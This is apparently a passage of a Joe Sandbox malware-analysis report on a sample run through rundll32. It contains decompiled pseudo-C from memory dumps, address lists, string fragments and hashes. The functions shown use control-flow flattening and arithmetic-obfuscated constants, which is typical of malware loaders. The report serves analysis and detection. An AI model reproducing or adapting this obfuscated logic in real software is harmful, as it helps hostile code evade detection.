								E002A1ECD( *(_t486 + 0x30),  *((intOrPtr*)(_t465 + 0x24)),  *(_t486 + 0x44),  *((intOrPtr*)(_t486 + 0xac)),  *(_t486 + 0x1c));
								_t486 = _t486 + 0xc;
								_t433 = 0xec93344;
							}
							continue;
						}
						_t481 = _t469;
						while(1) {
							__eflags =  *((intOrPtr*)(_t481 + 4)) - 4;
							if( *((intOrPtr*)(_t481 + 4)) != 4) {
								goto L13;
							}
							L12:
							_t340 = _t481 + 0xc; // 0x65dd
							_t428 = E0029F99E(_t484,  *((intOrPtr*)(_t486 + 0x80)), _t340,  *(_t486 + 0x5c),  *(_t486 + 0x68));
							_t486 = _t486 + 0xc;
							__eflags = _t428;
							if(_t428 == 0) {
								_t422 = 1;
								 *(_t486 + 0xb8) = 1;
								L18:
								_t480 = 0x216d57e9;
								goto L19;
							}
							L13:
							_t426 =  *_t481;
							__eflags = _t426;
							if(_t426 == 0) {
								_t422 =  *(_t486 + 0xb8);
								goto L18;
							}
							_t481 = _t481 + _t426;
							__eflags =  *((intOrPtr*)(_t481 + 4)) - 4;
							if( *((intOrPtr*)(_t481 + 4)) != 4) {
								goto L13;
							}
							goto L12;
						}
					}
					if(_t433 == 0x21769d07) {
						E002A0DE5( *(_t486 + 0x4c),  *(_t486 + 0xa4), _t431,  *(_t486 + 0x74));
						L31:
						__eflags = 0;
						return 0;
					}
					if(_t433 != 0x3177d3dd) {
						L28:
						__eflags = _t433 - 0x8bf23fa;
						if(__eflags != 0) {
							continue;
						}
						goto L31;
					}
					_t433 = 0x71db371;
				}
				_t409 = E002A8409( *(_t486 + 0x68), 0x2000000,  *(_t486 + 0x5c),  *(_t486 + 0x50),  *((intOrPtr*)(_t486 + 0x90)), _t433,  *(_t486 + 0xb0),  *(_t486 + 0xa4),  *(_t486 + 0x34),  *(_t486 + 0x24) | 0x00000006, _t433, _t486 + 0xd0, 1,  *((intOrPtr*)(_t486 + 0x10)));
				_t431 = _t409;
				_t486 = _t486 + 0x30;
				__eflags = _t409 - 0xffffffff;
				if(__eflags == 0) {
					_t433 = 0x8bf23fa;
					goto L28;
				}
				_t433 = 0x197f34ec;
				goto L1;
			}

0x002a8e7f
0x002a8e8c
0x002a8e95
0x002a8ea0
0x002a8ea5
0x002a8ead
0x002a8eb5
0x002a8ebd
0x002a8ec5
0x002a8ecd
0x002a8ed2
0x002a8eda
0x002a8eea
0x002a8eee
0x002a8ef6
0x002a8efe
0x002a8f0c
0x002a8f11
0x002a8f17
0x002a8f1f
0x002a8f2a
0x002a8f32
0x002a8f3d
0x002a8f45
0x002a8f4d
0x002a8f5a
0x002a8f5d
0x002a8f61
0x002a8f69
0x002a8f74
0x002a8f7f
0x002a8f8a
0x002a8fa0
0x002a8fa7
0x002a8fb2
0x002a8fbd
0x002a8fc8
0x002a8fd3
0x002a8fdb
0x002a8fe3
0x002a8ff0
0x002a8ff3
0x002a8ff7
0x002a8fff
0x002a900f
0x002a9013
0x002a901b
0x002a9020
0x002a9028
0x002a9030
0x002a9038
0x002a9040
0x002a9048
0x002a905a
0x002a905d
0x002a9064
0x002a906f
0x002a907a
0x002a9087
0x002a9092
0x002a909a
0x002a90a2
0x002a90b0
0x002a90b5
0x002a90bb
0x002a90c3
0x002a90cb
0x002a90d3
0x002a90d8
0x002a90dd
0x002a90e5
0x002a90ed
0x002a90f5
0x002a90fd
0x002a9105
0x002a910d
0x002a9112
0x002a9117
0x002a911f
0x002a9127
0x002a912f
0x002a9137
0x002a913f
0x002a9147
0x002a914f
0x002a9157
0x002a915f
0x002a9172
0x002a9175
0x002a917c
0x002a9187
0x002a9192
0x002a919d
0x002a91a8
0x002a91b0
0x002a91b8
0x002a91c0
0x002a91c5
0x002a91cd
0x002a91d5
0x002a91dd
0x002a91e2
0x002a91ea
0x002a91f2
0x002a91ff
0x002a9203
0x002a920b
0x002a9216
0x002a9221
0x002a922c
0x002a9237
0x002a9242
0x002a924d
0x002a9255
0x002a9262
0x002a9266
0x002a926b
0x002a9273
0x002a927f
0x002a9282
0x002a9286
0x002a928b
0x002a9293
0x002a929b
0x002a92a0
0x002a92aa
0x002a92b2
0x002a92c1
0x002a92c2
0x002a92c9
0x002a92d0
0x002a92d4
0x002a92dc
0x002a92e4
0x002a92ec
0x002a92f4
0x002a92fc
0x002a9304
0x002a930c
0x002a9314
0x002a931c
0x002a9324
0x002a932c
0x002a9334
0x002a933f
0x002a934a
0x002a9355
0x002a935d
0x002a9365
0x002a936d
0x002a9375
0x002a937d
0x002a9388
0x002a9390
0x002a939b
0x002a93a8
0x002a93af
0x002a93b3
0x002a93bb
0x002a93c3
0x002a93cb
0x002a93d3
0x002a93d8
0x002a93e0
0x002a93e8
0x002a93f0
0x002a93f8
0x002a9400
0x002a9408
0x002a9413
0x002a941b
0x002a9426
0x002a9434
0x002a9439
0x002a943d
0x002a9442
0x002a944a
0x002a9452
0x002a945a
0x002a9464
0x002a9468
0x00000000
0x002a9470
0x002a9482
0x002a9611
0x002a9633
0x002a9638
0x002a963a
0x002a963f
0x002a9644
0x00000000
0x002a9644
0x002a948e
0x002a95ea
0x002a95f0
0x00000000
0x002a95f0
0x002a949a
0x002a95b2
0x002a95b3
0x002a95b9
0x002a95c9
0x002a95cb
0x002a95ce
0x002a95d5
0x00000000
0x002a95d5
0x002a94a2
0x002a9509
0x002a950e
0x002a9511
0x002a9513
0x002a9554
0x002a9569
0x002a9569
0x002a956b
0x002a959b
0x002a956d
0x002a957c
0x002a9589
0x002a958e
0x002a9591
0x002a9591
0x00000000
0x002a956b
0x002a9515
0x002a9517
0x002a9517
0x002a951b
0x00000000
0x00000000
0x002a951d
0x002a9521
0x002a9532
0x002a9537
0x002a953a
0x002a953c
0x002a954a
0x002a954b
0x002a9564
0x002a9564
0x00000000
0x002a9564
0x002a953e
0x002a953e
0x002a9540
0x002a9542
0x002a955d
0x00000000
0x002a955d
0x002a9544
0x002a9517
0x002a951b
0x00000000
0x00000000
0x00000000
0x002a951b
0x002a9517
0x002a94aa
0x002a96d2
0x002a96da
0x002a96dd
0x002a96e6
0x002a96e6
0x002a94b6
0x002a96ad
0x002a96ad
0x002a96b3
0x00000000
0x00000000
0x00000000
0x002a96b9
0x002a94bc
0x002a94bc
0x002a968f
0x002a9694
0x002a9696
0x002a9699
0x002a969c
0x002a96a8
0x00000000
0x002a96a8
0x002a969e
0x00000000

Strings

Wm!, xrefs: 002A9434
*F, xrefs: 002A919D
]W, xrefs: 002A9221
Wm!, xrefs: 002A9564
G, xrefs: 002A9064
Ns, xrefs: 002A8FB2
', xrefs: 002A9273
ow, xrefs: 002A93C3
document, file, xrefs: 002A9658
|B, xrefs: 002A9147
{c, xrefs: 002A932C
*G, xrefs: 002A9092
<|, xrefs: 002A9390
ND, xrefs: 002A944A

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: document, file$*F$*G$<|$ND$Ns$]W$ow${c$|B$'$G$Wm!$Wm!
API String ID: 2962429428-2268811337
Opcode ID: 3a62f02007c48b517683cddfd01101361d5bce27e94fabf6a9e64f099c992cda
Instruction ID: da7be7faf79b03cb7e5e17e3335dd82c9e8451d5716475dda311368614a7b4d4
Opcode Fuzzy Hash: 3a62f02007c48b517683cddfd01101361d5bce27e94fabf6a9e64f099c992cda
Instruction Fuzzy Hash: 46125271519380DFE3A4CF25C989A5BBBE1FBC5744F10890DE2DA862A0DBB58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002A5D36, Relevance: 16.6, Strings: 13, Instructions: 392
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E002A5D36(intOrPtr* __ecx, intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				intOrPtr _v212;
				signed int _v216;
				intOrPtr _v220;
				signed int _v224;
				unsigned int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				void* _t364;
				intOrPtr _t401;
				intOrPtr _t404;
				intOrPtr _t409;
				intOrPtr _t411;
				void* _t412;
				signed int _t416;
				void* _t427;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				intOrPtr _t439;
				intOrPtr* _t445;
				char* _t479;
				signed int _t480;
				signed int _t481;
				char* _t482;
				signed int _t483;
				signed int _t484;
				intOrPtr* _t487;
				signed int* _t489;
				void* _t491;

				_push(_a16);
				_t429 = __edx;
				_t487 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t364);
				_v248 = 0x7aeb;
				_t489 =  &(( &_v264)[6]);
				_v248 = _v248 + 0xffff9799;
				_t483 = 0x2905c209;
				_v128 = _v128 & 0x00000000;
				_t431 = 0x6e;
				_v248 = _v248 / _t431;
				_v248 = _v248 + 0x3986;
				_v248 = _v248 ^ 0x000039f1;
				_v192 = 0xca36;
				_v192 = _v192 + 0x9526;
				_t480 = 0x4a;
				_t432 = 0x72;
				_v192 = _v192 * 0x72;
				_v192 = _v192 ^ 0x009c76fa;
				_v176 = 0x9123;
				_v176 = _v176 + 0x922f;
				_v176 = _v176 ^ 0xfd652240;
				_v176 = _v176 ^ 0xfd6446f9;
				_v144 = 0x31c;
				_v144 = _v144 << 0x10;
				_v144 = _v144 ^ 0x031c0ec9;
				_v152 = 0x69a7;
				_v152 = _v152 / _t480;
				_v152 = _v152 ^ 0x00002444;
				_v168 = 0x50c2;
				_v168 = _v168 + 0x7c40;
				_v168 = _v168 ^ 0x88d3bbe7;
				_v168 = _v168 ^ 0x88d36899;
				_v204 = 0x101c;
				_v204 = _v204 * 0x17;
				_v204 = _v204 / _t432;
				_v204 = _v204 ^ 0xfd2b18ae;
				_v204 = _v204 ^ 0xfd2b265d;
				_v156 = 0x658b;
				_v156 = _v156 << 7;
				_t433 = 0x42;
				_v156 = _v156 / _t433;
				_v156 = _v156 ^ 0x0000fdf0;
				_v244 = 0xffb5;
				_v244 = _v244 >> 1;
				_v244 = _v244 / _t480;
				_v244 = _v244 >> 1;
				_v244 = _v244 ^ 0x00005dce;
				_v132 = 0x3193;
				_v132 = _v132 * 0x1b;
				_v132 = _v132 ^ 0x000561fb;
				_v164 = 0xa667;
				_v164 = _v164 << 0xa;
				_t434 = 0x3d;
				_v164 = _v164 / _t434;
				_v164 = _v164 ^ 0x000a81f1;
				_v172 = 0x7b75;
				_v172 = _v172 + 0xffffb5c9;
				_v172 = _v172 ^ 0x59441acb;
				_v172 = _v172 ^ 0x59444c61;
				_v200 = 0xfc5e;
				_v200 = _v200 + 0x9ad1;
				_t435 = 0x6e;
				_t481 = 0x52;
				_v200 = _v200 * 0x33;
				_v200 = _v200 ^ 0x00512420;
				_v160 = 0x2110;
				_v160 = _v160 / _t435;
				_v160 = _v160 >> 6;
				_v160 = _v160 ^ 0x0000709a;
				_v252 = 0xd2e5;
				_v252 = _v252 ^ 0x889a62ed;
				_v252 = _v252 + 0xffff7802;
				_v252 = _v252 + 0x83b1;
				_v252 = _v252 ^ 0x889a98ed;
				_v260 = 0x59bd;
				_v260 = _v260 >> 0xc;
				_v260 = _v260 << 9;
				_v260 = _v260 ^ 0x979198fc;
				_v260 = _v260 ^ 0x97919246;
				_v140 = 0x951a;
				_v140 = _v140 + 0xffffe012;
				_v140 = _v140 ^ 0x000024a5;
				_v264 = 0xa35c;
				_v264 = _v264 + 0x6bac;
				_v264 = _v264 + 0x6494;
				_v264 = _v264 + 0xffffc85b;
				_v264 = _v264 ^ 0x000173d7;
				_v208 = 0x9196;
				_v208 = _v208 + 0x42cf;
				_v208 = _v208 | 0x41e63773;
				_v208 = _v208 ^ 0xc001a7a7;
				_v208 = _v208 ^ 0x81e75dd0;
				_v240 = 0x6061;
				_v240 = _v240 << 7;
				_v240 = _v240 / _t481;
				_v240 = _v240 ^ 0x0a6214f0;
				_v240 = _v240 ^ 0x0a62c894;
				_v224 = 0x6ba4;
				_v224 = _v224 ^ 0xc434db96;
				_v224 = _v224 + 0x7649;
				_v224 = _v224 ^ 0x277494cb;
				_v224 = _v224 ^ 0xe3418cb8;
				_v180 = 0x97f8;
				_v180 = _v180 + 0x7a61;
				_v180 = _v180 | 0xaf533412;
				_v180 = _v180 ^ 0xaf53587e;
				_v188 = 0x4a2b;
				_v188 = _v188 + 0xffffeee7;
				_v188 = _v188 * 0x69;
				_v188 = _v188 ^ 0x0017037d;
				_v136 = 0x714d;
				_v136 = _v136 + 0xffff748b;
				_v136 = _v136 ^ 0xffffb279;
				_v196 = 0xd7b0;
				_t436 = 0x48;
				_v196 = _v196 / _t436;
				_v196 = _v196 / _t481;
				_v196 = _v196 ^ 0x00003ce2;
				_v216 = 0xd5fb;
				_v216 = _v216 + 0xa68;
				_v216 = _v216 | 0x791d863a;
				_v216 = _v216 >> 0xf;
				_v216 = _v216 ^ 0x00008f67;
				_v184 = 0x4bf6;
				_v184 = _v184 | 0xf44b95c1;
				_v184 = _v184 ^ 0xbb4e826a;
				_v184 = _v184 ^ 0x4f05014a;
				_v256 = 0xf4fe;
				_t437 = 0x50;
				_v256 = _v256 / _t437;
				_v256 = _v256 ^ 0x14b50033;
				_t438 = 0x34;
				_v256 = _v256 / _t438;
				_v256 = _v256 ^ 0x0065b701;
				_v232 = 0xb2ca;
				_v232 = _v232 << 0xf;
				_v232 = _v232 + 0xfffff7b7;
				_v232 = _v232 >> 1;
				_v232 = _v232 ^ 0x2cb20e9c;
				_v228 = 0xbca0;
				_v228 = _v228 >> 1;
				_v228 = _v228 + 0x7aaf;
				_v228 = _v228 + 0xda3;
				_v228 = _v228 ^ 0x00009b49;
				_v236 = 0xf1ac;
				_v236 = _v236 * 0x64;
				_v236 = _v236 | 0xe258fcc9;
				_v236 = _v236 + 0xfbbb;
				_v236 = _v236 ^ 0xe25fddd2;
				_v148 = 0x73ca;
				_v148 = _v148 ^ 0x2d0eeb68;
				_v148 = _v148 ^ 0x2d0e98a3;
				_t482 = _v120;
				goto L1;
				do {
					while(1) {
						L1:
						_t439 = _v212;
						_t396 = _v220;
						while(1) {
							L2:
							_t491 = _t483 - 0x2905c209;
							if(_t491 > 0) {
								break;
							}
							if(_t491 == 0) {
								_t483 = 0xef221de;
								continue;
							}
							if(_t483 == 0x6538981) {
								_v116 = 0x6c;
								_t409 =  *0x2af9d0; // 0x0
								_t411 =  *0x2af9d0; // 0x0
								_t412 = E002A9FA1( &_v108, _v148,  *((intOrPtr*)(_t411 + 4)),  &_v116, _v240, _v224, _v180, _v188,  *((intOrPtr*)(_t409 + 0x30)), _v248, _v136, _v196);
								_t489 =  &(_t489[0xa]);
								if(_t412 == 0) {
									_t483 = 0x29c171a3;
									while(1) {
										L1:
										_t439 = _v212;
										_t396 = _v220;
										goto L2;
									}
								}
								_t445 =  &_v1;
								_t479 = _t482;
								do {
									 *_t479 =  *_t445;
									_t479 = _t479 + 1;
									_t445 = _t445 - 1;
								} while (_t445 >=  &_v96);
								_t483 = 0x1c508320;
								while(1) {
									L1:
									_t439 = _v212;
									_t396 = _v220;
									goto L2;
								}
							}
							if(_t483 == 0xef221de) {
								_t416 = _a4 + 1;
								if((_t416 & 0x0000000f) != 0) {
									_t416 = (_t416 & 0xfffffff0) + 0x10;
								}
								 *((intOrPtr*)(_t429 + 4)) = _t416 + 0x74;
								_push(_t439);
								_push(_t439);
								_t482 = E002A9E2B( *((intOrPtr*)(_t429 + 4)));
								_t489 =  &(_t489[3]);
								 *_t429 = _t482;
								if(_t482 == 0) {
									goto L31;
								} else {
									_t323 = _t482 + 0x74; // 0x74
									_t439 = _t323;
									_v120 = _a4;
									_t483 = 0x2dc45afa;
									_t396 =  *((intOrPtr*)(_t429 + 4)) - 0x74;
									_v212 = _t439;
									_v220 =  *((intOrPtr*)(_t429 + 4)) - 0x74;
									continue;
								}
							}
							if(_t483 == 0x133a3c94) {
								E0029689F(_v200,  *_t487, _a4, _t439, _v160);
								_t489 =  &(_t489[3]);
								_t483 = 0x33df575d;
								while(1) {
									L1:
									_t439 = _v212;
									_t396 = _v220;
									goto L2;
								}
							}
							if(_t483 != 0x1c508320) {
								goto L30;
							}
							_v112 = 0x14;
							_t427 = E0029DA84( &_v112, _v124, _v216, _t482 + 0x60, _v192, _v184, _v256, _t439, _v232);
							_t439 = _v212;
							_t489 =  &(_t489[7]);
							_t396 = _v220;
							if(_t427 == 0) {
								continue;
							}
							_t483 = 0x29c171a3;
							_v128 = 1;
							while(1) {
								L1:
								_t439 = _v212;
								_t396 = _v220;
								goto L2;
							}
						}
						if(_t483 == 0x29c171a3) {
							_push(_t439);
							E002975B4(_v124);
							_t483 = 0x3587c7e9;
							break;
						}
						if(_t483 == 0x2dc45afa) {
							_t401 =  *0x2af9d0; // 0x0
							E00299563( &_v124, _t439,  *((intOrPtr*)(_t401 + 8)), _v244, _v132, _v164, _v172);
							_t489 =  &(_t489[6]);
							asm("sbb esi, esi");
							_t483 = (_t483 & 0xddb274ab) + 0x3587c7e9;
							while(1) {
								L1:
								_t439 = _v212;
								_t396 = _v220;
								goto L2;
							}
						}
						if(_t483 == 0x33df575d) {
							_t404 =  *0x2af9d0; // 0x0
							E0029DF83(_v252, _t439, _v124, _t439,  &_v120, _v260,  *((intOrPtr*)(_t404 + 4)), _t396, _v140, _v264, _v208);
							_t489 =  &(_t489[0xa]);
							asm("sbb esi, esi");
							_t483 = (_t483 & 0xdc9217de) + 0x29c171a3;
							continue;
						}
						if(_t483 != 0x3587c7e9) {
							break;
						}
						_t484 = _v128;
						if(_t484 == 0) {
							E0029EF80(_v204,  *_t429, _v156);
						}
						L32:
						return _t484;
					}
					L30:
				} while (_t483 != 0x110ea734);
				L31:
				_t484 = _v128;
				goto L32;
			}

0x002a5d40
0x002a5d47
0x002a5d49
0x002a5d4b
0x002a5d52
0x002a5d59
0x002a5d60
0x002a5d61
0x002a5d62
0x002a5d67
0x002a5d6f
0x002a5d72
0x002a5d80
0x002a5d85
0x002a5d8f
0x002a5d94
0x002a5d98
0x002a5da0
0x002a5da8
0x002a5db0
0x002a5dbf
0x002a5dc2
0x002a5dc3
0x002a5dc7
0x002a5dcf
0x002a5dd7
0x002a5ddf
0x002a5de7
0x002a5def
0x002a5dfa
0x002a5e02
0x002a5e0d
0x002a5e23
0x002a5e2a
0x002a5e35
0x002a5e3d
0x002a5e45
0x002a5e4d
0x002a5e55
0x002a5e64
0x002a5e70
0x002a5e74
0x002a5e7c
0x002a5e84
0x002a5e8f
0x002a5e9e
0x002a5ea3
0x002a5ea7
0x002a5eaf
0x002a5eb7
0x002a5ec1
0x002a5ec5
0x002a5ec9
0x002a5ed1
0x002a5ee4
0x002a5eeb
0x002a5ef8
0x002a5f00
0x002a5f0b
0x002a5f10
0x002a5f16
0x002a5f1e
0x002a5f26
0x002a5f2e
0x002a5f36
0x002a5f3e
0x002a5f46
0x002a5f53
0x002a5f56
0x002a5f57
0x002a5f5b
0x002a5f63
0x002a5f73
0x002a5f77
0x002a5f7c
0x002a5f84
0x002a5f8c
0x002a5f94
0x002a5f9c
0x002a5fa4
0x002a5fac
0x002a5fb4
0x002a5fb9
0x002a5fbe
0x002a5fc6
0x002a5fce
0x002a5fd9
0x002a5fe4
0x002a5fef
0x002a5ff7
0x002a5fff
0x002a6007
0x002a600f
0x002a6017
0x002a601f
0x002a6027
0x002a602f
0x002a6037
0x002a603f
0x002a6047
0x002a6052
0x002a6056
0x002a605e
0x002a6066
0x002a606e
0x002a6076
0x002a607e
0x002a6086
0x002a608e
0x002a6096
0x002a609e
0x002a60a6
0x002a60ae
0x002a60b6
0x002a60c3
0x002a60c7
0x002a60cf
0x002a60da
0x002a60e5
0x002a60f2
0x002a6100
0x002a6105
0x002a6111
0x002a6117
0x002a611f
0x002a6127
0x002a612f
0x002a6137
0x002a613c
0x002a6144
0x002a614c
0x002a6154
0x002a615c
0x002a6164
0x002a6170
0x002a6175
0x002a617b
0x002a6187
0x002a618a
0x002a618e
0x002a6196
0x002a619e
0x002a61a3
0x002a61ab
0x002a61af
0x002a61b7
0x002a61bf
0x002a61c3
0x002a61cb
0x002a61d3
0x002a61db
0x002a61e8
0x002a61ec
0x002a61f4
0x002a61fc
0x002a6204
0x002a620f
0x002a621a
0x002a6225
0x002a6225
0x002a622c
0x002a622c
0x002a622c
0x002a622c
0x002a6230
0x002a6234
0x002a6234
0x002a6234
0x002a623a
0x00000000
0x00000000
0x002a6240
0x002a63e4
0x00000000
0x002a63e4
0x002a624c
0x002a635e
0x002a637b
0x002a63a2
0x002a63aa
0x002a63af
0x002a63b4
0x002a63da
0x002a622c
0x002a622c
0x002a622c
0x002a6230
0x00000000
0x002a6230
0x002a622c
0x002a63b6
0x002a63bd
0x002a63bf
0x002a63c1
0x002a63c3
0x002a63c4
0x002a63cc
0x002a63d0
0x002a622c
0x002a622c
0x002a622c
0x002a6230
0x00000000
0x002a6230
0x002a622c
0x002a6258
0x002a62f5
0x002a62f8
0x002a62fd
0x002a62fd
0x002a6303
0x002a631c
0x002a631d
0x002a6326
0x002a6328
0x002a632b
0x002a632f
0x00000000
0x002a6335
0x002a6338
0x002a6338
0x002a633b
0x002a6342
0x002a634a
0x002a634d
0x002a6351
0x00000000
0x002a6351
0x002a632f
0x002a6264
0x002a62e0
0x002a62e5
0x002a62e8
0x002a622c
0x002a622c
0x002a622c
0x002a6230
0x00000000
0x002a6230
0x002a622c
0x002a626c
0x00000000
0x00000000
0x002a6279
0x002a62a4
0x002a62a9
0x002a62ad
0x002a62b2
0x002a62b6
0x00000000
0x00000000
0x002a62bc
0x002a62c1
0x002a622c
0x002a622c
0x002a622c
0x002a6230
0x00000000
0x002a6230
0x002a622c
0x002a63f4
0x002a64db
0x002a64dc
0x002a64e2
0x00000000
0x002a64e2
0x002a6400
0x002a649f
0x002a64af
0x002a64b4
0x002a64b9
0x002a64c1
0x002a622c
0x002a622c
0x002a622c
0x002a6230
0x00000000
0x002a6230
0x002a622c
0x002a640c
0x002a644e
0x002a646f
0x002a6474
0x002a6479
0x002a6481
0x00000000
0x002a6481
0x002a6414
0x00000000
0x00000000
0x002a641a
0x002a6423
0x002a6433
0x002a6438
0x002a64fb
0x002a6506
0x002a6506
0x002a64e7
0x002a64e7
0x002a64f3
0x002a64f3
0x00000000

Strings

Mq, xrefs: 002A60CF
Iv, xrefs: 002A6076
<, xrefs: 002A6117
h, xrefs: 002A6127
3, xrefs: 002A617B
l, xrefs: 002A635E
$Q, xrefs: 002A5F5B
D$, xrefs: 002A5E2A
az, xrefs: 002A6096
a`, xrefs: 002A603F
aLDY, xrefs: 002A5F36
+J, xrefs: 002A60AE
s7A, xrefs: 002A6027

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $Q$+J$3$D$$Iv$Mq$aLDY$a`$az$h$l$s7A$<
API String ID: 0-3996932931
Opcode ID: ce39d12a19bef2f2025998e75e59c873865de2166a2c641727f9adf760197a4f
Instruction ID: 41e7615912185f4defcc7e4892f9136519c2a4ff4431583bd2dff7c6bb6fe220
Opcode Fuzzy Hash: ce39d12a19bef2f2025998e75e59c873865de2166a2c641727f9adf760197a4f
Instruction Fuzzy Hash: 9F1262729083818FE768CF68C489A4BFBE1BBC9308F14891DF5D986260D7B58959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0029BB28, Relevance: 15.4, Strings: 12, Instructions: 407
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0029BB28(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				unsigned int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _t444;
				signed int _t448;
				void* _t457;
				signed int _t476;
				intOrPtr _t477;
				intOrPtr* _t480;
				void* _t482;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				signed int _t542;
				signed int _t543;
				intOrPtr _t544;
				void* _t545;
				void* _t548;
				void* _t551;
				intOrPtr* _t554;
				signed int* _t555;
				signed int* _t556;

				_t480 = __ecx;
				_t555 =  &_v316;
				_v144 = __edx;
				_v148 = __ecx;
				_v140 = 0x6a870;
				_v136 = 0;
				_v132 = 0;
				_v192 = 0x43a2;
				_v192 = _v192 + 0x130f;
				_v192 = _v192 ^ 0x00000862;
				_v228 = 0x6a30;
				_v228 = _v228 * 0x7c;
				_t545 = 0x39d92d58;
				_v228 = _v228 << 9;
				_v228 = _v228 ^ 0x66dea5d7;
				_v308 = 0xc191;
				_v308 = _v308 + 0xab60;
				_v308 = _v308 ^ 0xd5684b93;
				_t533 = 0x79;
				_v308 = _v308 / _t533;
				_v308 = _v308 ^ 0x01c3b293;
				_v168 = 0x473;
				_v168 = _v168 >> 3;
				_v168 = _v168 ^ 0x00007ae9;
				_v208 = 0x2774;
				_v208 = _v208 ^ 0x1e9334f1;
				_v208 = _v208 ^ 0x1e932766;
				_v276 = 0x7682;
				_v276 = _v276 + 0xee95;
				_t534 = 0x74;
				_v276 = _v276 / _t534;
				_t535 = 0x17;
				_v276 = _v276 * 0x72;
				_v276 = _v276 ^ 0x00014fdc;
				_v216 = 0xba57;
				_v216 = _v216 ^ 0x53d3d51f;
				_v216 = _v216 ^ 0x53d320fa;
				_v284 = 0xb8fa;
				_v284 = _v284 / _t535;
				_v284 = _v284 + 0xffff24c4;
				_v284 = _v284 << 0x10;
				_v284 = _v284 ^ 0x2cce038a;
				_v268 = 0xf7b7;
				_t536 = 0x11;
				_v268 = _v268 * 0x32;
				_v268 = _v268 * 0x2b;
				_v268 = _v268 >> 3;
				_v268 = _v268 ^ 0x010416fb;
				_v300 = 0xb3f3;
				_v300 = _v300 << 0xe;
				_v300 = _v300 ^ 0x154d9390;
				_v300 = _v300 / _t536;
				_v300 = _v300 ^ 0x0364be3c;
				_v172 = 0x2c2b;
				_v172 = _v172 + 0xffffec7c;
				_v172 = _v172 ^ 0x00001ae8;
				_v224 = 0x911c;
				_v224 = _v224 << 0x10;
				_t537 = 0x71;
				_v224 = _v224 * 0x60;
				_v224 = _v224 ^ 0x6a80737f;
				_v184 = 0xdd2a;
				_v184 = _v184 >> 0xc;
				_v184 = _v184 ^ 0x000035d1;
				_v292 = 0xdbbc;
				_v292 = _v292 << 0xa;
				_v292 = _v292 / _t537;
				_v292 = _v292 + 0x1f68;
				_v292 = _v292 ^ 0x0007b889;
				_v232 = 0xfe49;
				_t538 = 0x27;
				_v232 = _v232 / _t538;
				_v232 = _v232 | 0x70a43f1f;
				_v232 = _v232 ^ 0x70a403ca;
				_v164 = 0xb7fd;
				_t476 = 0x1c;
				_v164 = _v164 / _t476;
				_v164 = _v164 ^ 0x00007732;
				_v316 = 0x3b81;
				_v316 = _v316 + 0xffffa23f;
				_v316 = _v316 ^ 0x6ce925b7;
				_v316 = _v316 << 4;
				_v316 = _v316 ^ 0x316ff323;
				_v248 = 0x9899;
				_v248 = _v248 + 0xfffffaa2;
				_v248 = _v248 >> 0xf;
				_v248 = _v248 ^ 0x00000670;
				_v176 = 0xc545;
				_t539 = 0x5a;
				_v176 = _v176 / _t539;
				_v176 = _v176 ^ 0x0000518c;
				_v256 = 0x5fe2;
				_v256 = _v256 | 0x0277acff;
				_v256 = _v256 ^ 0x07e6deb5;
				_v256 = _v256 ^ 0x05914433;
				_v240 = 0xd0b5;
				_v240 = _v240 ^ 0x5f0c7be6;
				_v240 = _v240 ^ 0xa82696c1;
				_v240 = _v240 ^ 0xf72a4da1;
				_v212 = 0xb3e0;
				_v212 = _v212 << 0x10;
				_v212 = _v212 ^ 0xb3e03660;
				_v312 = 0xefd7;
